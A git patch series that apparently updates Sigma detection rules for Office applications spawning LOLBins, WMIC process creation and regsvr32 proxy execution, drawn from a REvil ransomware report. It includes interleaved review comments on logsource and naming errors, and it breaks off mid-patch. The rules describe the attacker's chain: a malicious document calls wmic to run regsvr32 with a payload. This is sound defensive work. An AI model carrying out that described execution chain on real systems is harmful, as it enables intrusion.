@@ -208,7 +224,7 @@ def translate_ary(ary: Ary) -> dict: tempIndex += 1 counter += 1 - # If there's more than one, use "should" clase instead of "must" + # If there's more than one, use "should" clause instead of "must" if counter > 1: clause = "should" parsedExpression = [] @@ -223,9 +239,9 @@ def translate_ary(ary: Ary) -> dict: for boolean in parsedExpression: currMatches.append(translate_boolean(boolean)) - # If bool array contains a Group, match statements must also be wrapped in a bool. + # If bool array contains a Group which is wrapped in a bool, match statements must also be wrapped in a bool. if contains_group(parsedExpression): - currMatches = adjust_matches(currMatches) + currMatches = adjust_matches(currMatches, clause) currQuery = { "bool": { From 900f71e6b265bb88311c5fb6925accb0e7f7265b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 21:50:44 -0600 Subject: [PATCH 0653/1367] Rule Update Review Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ...ocess_Creations_by_Office_applications.yml | 26 +++++++++---------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index db13196c..a91cfcc2 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml 
@@ -1,25 +1,23 @@ -title: Monitor LOLBins Process Creations by Office applications (Security Event Logs) +title: LOLBins Process Created With Office Application description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: Windows - service: Sysmon category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 1 selection2: Image|endswith: @@ -35,5 +33,5 @@ detection: - powerpnt.exe condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file + - Unknown +level: high From d5fa226180fd5ed5f6ec3f554d23e1faeef35004 Mon Sep 17 00:00:00 2001 
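Review bot: `EventID: 1` is kept in `selection1` while `service: Sysmon` and the `EventLog` field are removed, so the rule still fits only Sysmon's process-creation event even though `category: process_creation` is meant to let each backend choose the source-specific event; either drop the `EventID` line entirely or keep the Sysmon logsource. The re-indented tag `attack.defence_evasion` is misspelled relative to the repository convention `attack.defense_evasion` used by the UAC-bypass rules earlier in this series, and `product: Windows` should be lowercase `windows` like those rules. The same three issues appear in the sibling hunks for the Wmiprvse and regsvr32 rules (patches 0654 and 0655 below). The untouched context line `Date: 2021/23/8` is neither the `date:` key nor a valid YYYY/MM/DD value, though this commit does not change it.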
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 21:54:32 -0600 Subject: [PATCH 0654/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ...creations_with_Wmiprvse_parent_process.yml | 24 +++++++++---------- 1 file changed, 11 insertions(+), 13 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 3acabbea..f08b2b5a 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml 
@@ -1,25 +1,23 @@ -title: LOLBins process creations with Wmiprvse parent process(sysmon) +title: LOLBins Process Created With WmiPrvSE description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: Windows - service: Sysmon category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 1 selection2: Image|endswith: @@ -34,4 +32,4 @@ detection: condition: selection1 AND selection2 AND selection3 falsepositives: - "FPs are possible here, but some LOLBins weren't excluded for obvious reasons." -level: high \ No newline at end of file +level: high From c7c49c55d29852443c25058079cb411e0b2e713e Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 21:58:09 -0600 Subject: [PATCH 0655/1367] Updated Rule - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ..._proxy_executing_regsvr32_with_payload.yml | 26 +++++++++---------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 71e30907..bd8f9bfb 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml 
@@ -1,25 +1,23 @@ -title: Monitor Excel from proxy executing regsvr32 with payload (Sysmon) +title: Excel Proxy Executing Regsvr32 With Payload description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: Windows - service: Sysmon category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 1 selection2: - Image: '*\wbem\WMIC.exe' @@ -45,5 +43,5 @@ detection: - 'call' condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From fa3b882fdc8a628aaf498055a4f1498e236ec704 Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 21:58:50 -0600 Subject: [PATCH 0656/1367] Updated Rule Removed " " from falsepositives section --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index f08b2b5a..055e8faf 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -31,5 +31,5 @@ detection: - "\\wbem\\WmiPrvSE.exe" condition: selection1 AND selection2 AND selection3 falsepositives: -- "FPs are possible here, but some LOLBins weren't excluded for obvious reasons." +- FPs are possible here, but some LOLBins weren't excluded for obvious reasons. level: high From d5f73a8910f4a7742aec5040e37ad119b79413fb Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:03:31 -0600 Subject: [PATCH 0657/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ...ice_applications_using_file_extentions.yml | 26 +++++++++---------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 61716031..6f73f778 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
+++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,25 +1,23 @@ -title: monitor executable and script files creation by Office applications, using file extentions (Sysmon). +title: Created Executables and Script Files By Office Applications description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: Windows - service: Sysmon category: process_creation detection: - description: Please add more file extentions to the logic of your choice. + #useful_information: Please add more file extentions to the logic of your choice. selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 11 selection2: Image|endswith: @@ -40,5 +38,5 @@ detection: - ".proj" condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 785fc98ee3e2bb966457032af512e6e6f2ae7e55 Mon Sep 17 00:00:00 2001 
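Review bot: With `service: Sysmon` removed the logsource is `product: Windows` / `category: process_creation`, yet selection1 matches `EventID: 11` (Sysmon FileCreate) and the title and description say the rule is about files created by Office applications; the category should be `file_event` (or the Sysmon service kept), otherwise a backend that maps process_creation to its own event id and field set produces a contradictory query. The EDR variant, rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml later in this series, has the same `category: process_creation` mismatch next to `EventType: - FileCreate` and the `4D5A` magic-byte selection.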
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:05:10 -0600 Subject: [PATCH 0658/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ...Applications_Spawning_WMI_command-line.yml | 26 +++++++++---------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index fbeedaad..92cb14f0 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml 
@@ -1,25 +1,23 @@ -title: Office Applications Spawning WMI command-line (sysmon) +title: Office Applications Spawning Wmi Cli description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: windows - service: sysmon category: process_creation detection: - description: Add more office applications to the rule logic of choice + #useful_information: Add more office applications to the rule logic of choice selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 1 selection2: - Image: '\wbem\WMIC.exe' @@ -33,5 +31,5 @@ detection: - powerpnt.exe condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 93334878f50bb381263e89b0284d164c9797b2d5 Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:09:57 -0600 Subject: [PATCH 0659/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...ocess_Creations_by_Office_applications.yml | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 6b77a997..ee577373 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml 
@@ -1,15 +1,15 @@ -title: Monitor LOLBins Process Creations by Office applications (Security Event Logs) +title: Created Executables and Script Files By Office Applications description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -17,7 +17,7 @@ logsource: service: security category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: EventLog: security EventID: 4688 @@ -35,5 +35,5 @@ detection: - powerpnt.exe condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From d309784e58cb4b2b4a9695affc3f9c9cb6fe8e6a Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:12:34 -0600 Subject: [PATCH 0660/1367] Updated Rule Modified Title --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index ee577373..009f56a8 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,4 @@ -title: Created Executables and Script Files By Office Applications +title: Created Executables and Files by Office Applications description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From c5507658c0c91a75b24e182bced350ae80905e2d Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:13:31 -0600 Subject: [PATCH 0661/1367] Updated Rule updated title --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 6f73f778..81a3348f 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
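Review bot: The new title `Created Executables and Files by Office Applications` still describes file creation, while this file (Monitor_LOLBins_Process_Creations_by_Office_applications.yml) and its description cover an Office application spawning a LOLBin process on Security 4688; a title such as `LOLBin Process Created by Office Application` would match the detection. The next commit gives the genuine file-creation rule the identical title, so the two rules become indistinguishable by title in alert lists.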
@@ -1,4 +1,4 @@ -title: Created Executables and Script Files By Office Applications +title: Created Executables and Files by Office Applications description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From 1b9a0c4a01f8830f70a8d67e67eeeead64d6b185 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:20:17 -0600 Subject: [PATCH 0662/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...creations_with_Wmiprvse_parent_process.yml | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 90d5557e..62db1db1 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml 
@@ -1,15 +1,15 @@ -title: LOLBins process creations with Wmiprvse parent process. (Security Event Logs) +title: Lolbins Process Creation with WmiPrvse description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -17,7 +17,7 @@ logsource: service: security category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: EventLog: security EventID: 4688 @@ -33,5 +33,5 @@ detection: - "\\wbem\\WmiPrvSE.exe" condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 0d2257fb197e61cb0edf089e824b0ecb4e148a49 Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:22:01 -0600 Subject: [PATCH 0663/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ..._proxy executing_regsvr32_with_payload.yml | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index b54db391..2de29b7e 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml 
@@ -1,15 +1,15 @@ -title: Monitor Excel from proxy executing regsvr32 with payload (Security Event Logs) +title: Excel Proxy Executing Regsvr32 With Payload description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -43,5 +43,5 @@ detection: - 'call' condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From f2b8b83fe3fd9f56d947e50939a49173b090de20 Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:23:45 -0600 Subject: [PATCH 0664/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...Applications_Spawning_WMI_command-line.yml | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index df25ef11..845e84e2 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -1,15 +1,15 @@ -title: Office Applications Spawning WMI command-line (Security Event Logs) +title: Office Applications Spawning Wmi Cli description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: 
@@ -17,7 +17,7 @@ logsource: service: security category: process_creation detection: - description: Add more office applications to the rule logic of choice + #useful_information: Add more office applications to the rule logic of choice selection1: - EventLog: security selection2: @@ -32,5 +32,5 @@ detection: - powerpnt.exe condition: selection1 AND selection2 AND selection3 AND selection4 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From e7c7e4c0614c1df35fb029a24c5d2601be894a9a Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:24:28 -0600 Subject: [PATCH 0665/1367] Updated Rule Detection changed to #useful_information --- ...e_Application_from_proxy executing_regsvr32_with_payload.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 2de29b7e..6842e7ca 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -17,7 +17,7 @@ logsource: service: security category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: EventLog: security EventID: 4688 From e0e1396dffd48408b984dff37862e90dad46f511 Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:26:44 -0600 Subject: [PATCH 0666/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...mmand_execution_by_Office_Applications.yml | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 565467ed..0b20eece 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml 
@@ -1,22 +1,22 @@ -title: Monitor WMI "Win32_Process::Create" command execution by Office Applications. -description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +title: WMI Command Execution by Office Applications +description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: EndPoint Detection Logs category: process_creation detection: - description: Add more office applications to the rule logic of choice + #useful_information: Add more office applications to the rule logic of choice selection1: EventLog: EDR EventType: WMIExecution @@ -28,5 +28,5 @@ detection: - '*\powerpnt.exe' condition: selection1 AND selection2 falsepositives: -- "" -level: high \ No newline at end of file +- 